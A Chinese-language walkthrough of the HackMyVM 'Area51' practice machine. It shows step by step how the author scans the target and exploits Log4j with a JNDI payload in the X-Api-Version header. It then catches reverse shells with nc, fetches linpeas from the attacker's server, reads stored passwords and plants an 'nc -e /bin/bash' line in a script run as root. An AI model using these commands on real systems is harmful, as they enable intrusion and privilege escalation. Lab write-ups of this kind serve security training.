記一次對(duì)Hackmyvm-Area51靶機(jī)的滲透測(cè)試

靶機(jī)信息

靶機(jī)地址：https://hackmyvm.eu/machines/machine.php?vm=Area51

名稱(chēng)：Area51(51區(qū))

難度：中等

創(chuàng)作者：bit

發(fā)布日期：2021-12-24

目標(biāo)：user.txt和root.txt

搭建靶機(jī)

下載完Area51.ova后，使用Oracle VM VirtualBox導(dǎo)入即可

導(dǎo)入時(shí)注意?。〔灰瓷蟄SB控制器，不然會(huì)出錯(cuò)

導(dǎo)入完成后，直接啟動(dòng)即可，就可以開(kāi)始靶機(jī)之旅

實(shí)驗(yàn)環(huán)境

攻擊機(jī)：VMwareKali192.168.2.148
目標(biāo)機(jī)：VirtualBoxDebianIP自動(dòng)獲取

信息收集

掃描局域網(wǎng)內(nèi)的靶機(jī)IP地址

nmap -sn 192.168.2.0/24

端口掃描，掃描目標(biāo)機(jī)器所開(kāi)放的服務(wù)

nmap -A -p- 192.168.2.108

掃描到22(SSH)、80(HTTP)、8080(HTTP)三個(gè)端口，使用火狐瀏覽器訪問(wèn)80端口，192.168.2.108

好家伙佛波樂(lè)(FBI)頁(yè)面，訪問(wèn)下8080端口，192.168.2.108:8080

發(fā)現(xiàn)是一個(gè)400報(bào)錯(cuò)頁(yè)面

目錄掃描，掃描一些敏感文件之類(lèi)的，使用gobuster來(lái)掃描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.2.108/ -x php,html,txt

掃描到一個(gè)note.txt，訪問(wèn)下192.168.2.108/note.txt

翻譯看看

滲透測(cè)試

提示存在Log4j漏洞，猜測(cè)到很有可能跟8080端口有關(guān)，直接訪問(wèn)，使用Burp的插件log4j掃描看看

發(fā)現(xiàn)X-Api-Version：參數(shù)存在漏洞

存在log4j漏洞，使用poc(https://github.com/kozmer/log4j-shell-poc)拿shell

在kali機(jī)器中，log4j-shell-poc目錄下必須有jdk1.8.0_20文件夾的java

(https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz)

git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc
python3 poc.py --userip 192.168.2.148

新開(kāi)一個(gè)終端頁(yè)面開(kāi)啟監(jiān)聽(tīng)

nc -nvlp 9001

再新開(kāi)一個(gè)終端頁(yè)面，輸入剛剛的payload

curl 'http://192.168.2.108:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.2.148:1389/a}'

監(jiān)聽(tīng)這邊的終端就收到了

發(fā)現(xiàn)是在docker里面，上傳一個(gè)linpeas.sh搜集下信息

kali機(jī)器下載好linpeas.sh，新開(kāi)一個(gè)終端頁(yè)面開(kāi)啟遠(yuǎn)程下載服務(wù)

python3 -m http.server 7788

監(jiān)聽(tīng)這邊的終端頁(yè)面執(zhí)行下載linpeas.sh

wget http://192.168.2.148:7788/linpeas.sh

執(zhí)行l(wèi)inpeas.sh信息收集

chmod +x linpeas.sh
./linpeas.sh

發(fā)現(xiàn)一些目錄查看下

cat /var/tmp/.roger，查詢到roger的密碼
使用ssh遠(yuǎn)程登錄
ssh [email protected]

拿到user.txt下的一個(gè)FLAG=[xxxxxx]

繼續(xù)使用linpeas.sh搜集信息

wget http://192.168.2.148:7788/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

發(fā)現(xiàn)了roger下有個(gè)kang

cat /etc/pam.d/kang，發(fā)現(xiàn)是kang的密碼
su kang

發(fā)現(xiàn)kang的主目錄發(fā)生了一些奇怪的事情，一個(gè)文件不斷出現(xiàn)并消失

看起來(lái)像是kang用戶創(chuàng)建了一個(gè)shell腳本，執(zhí)行所有的.sh文件并刪除它們

echo "echo test >/tmp/test" > test.sh
ls /tmp/test -l
echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh

新開(kāi)一個(gè)終端頁(yè)面開(kāi)啟監(jiān)聽(tīng)

nc -nvlp 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd root
cat root.txt

成功獲取到root權(quán)限下的FLAG=[xxxxx]